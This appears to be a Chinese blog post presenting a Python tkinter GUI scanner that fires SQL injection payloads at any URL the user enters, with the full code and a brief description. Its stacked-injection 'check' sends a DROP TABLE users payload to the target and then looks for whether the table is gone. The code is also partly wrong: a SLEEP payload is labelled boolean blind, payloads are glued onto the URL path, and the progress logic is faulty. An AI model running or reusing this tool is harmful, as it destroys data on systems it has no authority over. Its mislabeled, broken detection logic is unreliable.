这是一个SQL注入漏洞检测工具,使用了Python的tkinter库创建了一个图形化界面。用户在界面中输入目标URL,然后点击"开始扫描"按钮来检测是否存在SQL注入漏洞。
定义了几个函数来检测不同类型的SQL注入漏洞,包括布尔盲注、时间盲注、报错注入、UNION联合查询注入和堆叠注入。这些函数向目标URL发送特定的payload,并根据响应结果判断是否存在漏洞。
检测过程通过创建一个ScanThread线程来执行,这样可以避免阻塞主界面。在线程中,依次调用各个漏洞检测函数,并将检测结果保存到vulnerabilities列表中。同时,更新进度条的值以显示检测进度。
检测完成后,停止进度条的动画,重新启用"开始扫描"按钮,并通过messagebox弹窗展示检测结果。如果未发现SQL注入漏洞,则弹窗显示"未发现SQL注入漏洞";如果存在漏洞,则弹窗显示具体的漏洞类型。
整个程序的界面由两个部分组成:URL输入框和按钮进度条。用户在URL输入框中输入目标URL,然后点击"开始扫描"按钮来触发漏洞检测。进度条会显示检测的进度。
代码:
import tkinter as tk
from tkinter import ttk
from tkinter import messagebox
import requests
import threading
# 检测布尔盲注漏洞
def check_boolean_blind_injection(url):
payload = "1' AND SLEEP(5) -- -"
test_url = f"{url}/{payload}"
response = requests.get(test_url)
if response.elapsed.total_seconds() >= 5:
return "存在布尔盲注漏洞"
else:
return ""
# 检测时间盲注漏洞
def check_time_blind_injection(url):
payload = "1' AND (SELECT COUNT(*) FROM sysobjects WHERE xtype = 'U') > 0; WAITFOR DELAY '0:0:5' -- -"
test_url = f"{url}/{payload}"
response = requests.get(test_url)
if response.elapsed.total_seconds() >= 5:
return "存在时间盲注漏洞"
else:
return ""
# 检测报错注入漏洞
def check_error_based_injection(url):
payload = "1' AND (SELECT CONVERT(INT, CHAR(65))) -- -"
test_url = f"{url}/{payload}"
response = requests.get(test_url)
if "Conversion failed" in response.text:
return "存在报错注入漏洞"
else:
return ""
# 检测UNION联合查询注入漏洞
def check_union_based_injection(url):
payload = "1' UNION SELECT 1,2,3 -- -"
test_url = f"{url}/{payload}"
response = requests.get(test_url)
if "1,2,3" in response.text:
return "存在UNION联合查询注入漏洞"
else:
return ""
# 检测堆叠注入漏洞
def check_stack_based_injection(url):
payload = "1'; DROP TABLE users; -- -"
test_url = f"{url}/{payload}"
response = requests.get(test_url)
# 检测表是否被删除
payload = "SELECT COUNT(*) FROM sysobjects WHERE xtype = 'U'"
test_url = f"{url}/{payload}"
response = requests.get(test_url)
if "users" not in response.text:
return "存在堆叠注入漏洞"
else:
return ""
# 扫描线程
class ScanThread(threading.Thread):
def __init__(self, url):
threading.Thread.__init__(self)
self.url = url
def run(self):
vulnerabilities = []
num_vulnerabilities = 0
result_boolean_blind = check_boolean_blind_injection(self.url)
if result_boolean_blind:
vulnerabilities.append(result_boolean_blind)
num_vulnerabilities += 1
progress_bar["value"] = (num_vulnerabilities/5) * 100
result_time_blind = check_time_blind_injection(self.url)
if result_time_blind:
vulnerabilities.append(result_time_blind)
num_vulnerabilities += 1
progress_bar["value"] = (num_vulnerabilities/5) * 100
result_error_based = check_error_based_injection(self.url)
if result_error_based:
vulnerabilities.append(result_error_based)
num_vulnerabilities += 1
progress_bar["value"] = (num_vulnerabilities/5) * 100
result_union_based = check_union_based_injection(self.url)
if result_union_based:
vulnerabilities.append(result_union_based)
num_vulnerabilities += 1
progress_bar["value"] = (num_vulnerabilities/5) * 100
result_stack_based = check_stack_based_injection(self.url)
if result_stack_based:
vulnerabilities.append(result_stack_based)
num_vulnerabilities += 1
progress_bar["value"] = (num_vulnerabilities/5) * 100
progress_bar.stop()
btn_detect.config(state=tk.NORMAL)
if not vulnerabilities:
messagebox.showinfo("提示", "未发现SQL注入漏洞")
else:
messagebox.showwarning("警告", "\n".join(vulnerabilities))
# 检测所有类型的SQL注入漏洞
def detect_vulnerabilities():
global progress_bar
url = entry_url.get()
if not url:
messagebox.showerror("错误", "请输入URL")
return
# 隐藏开始扫描按钮,显示进度条
btn_detect.config(state=tk.DISABLED)
progress_bar["value"] = 0
progress_bar.start()
# 开启一个线程来执行检测
thread = ScanThread(url)
thread.start()
# 创建窗口
window = tk.Tk()
window.title("SQL注入漏洞检测")
window.geometry("400x200")
# URL输入框
label_url = tk.Label(window, text="URL:")
label_url.pack()
entry_url = tk.Entry(window, width=40)
entry_url.pack()
# 检测按钮和进度条
frame_progress = tk.Frame(window)
frame_progress.pack(pady=10)
btn_detect = tk.Button(frame_progress, text="开始扫描", command=detect_vulnerabilities)
btn_detect.pack(side=tk.LEFT)
progress_bar = ttk.Progressbar(frame_progress, mode="determinate", length=200)
progress_bar.pack(side=tk.LEFT, padx=10)
# 运行窗口
window.mainloop()
运行截图如下:
输入目标网站的url后,点击“开始扫描”:
说明目标网站存在堆叠注入漏洞。
请注意,这段代码只是一个简单的示例,可以根据实际需要进行修改和扩展。在实际使用中,建议对目标URL进行合法性验证、异常处理等操作,以提高程序的健壮性和安全性。
与大家共勉。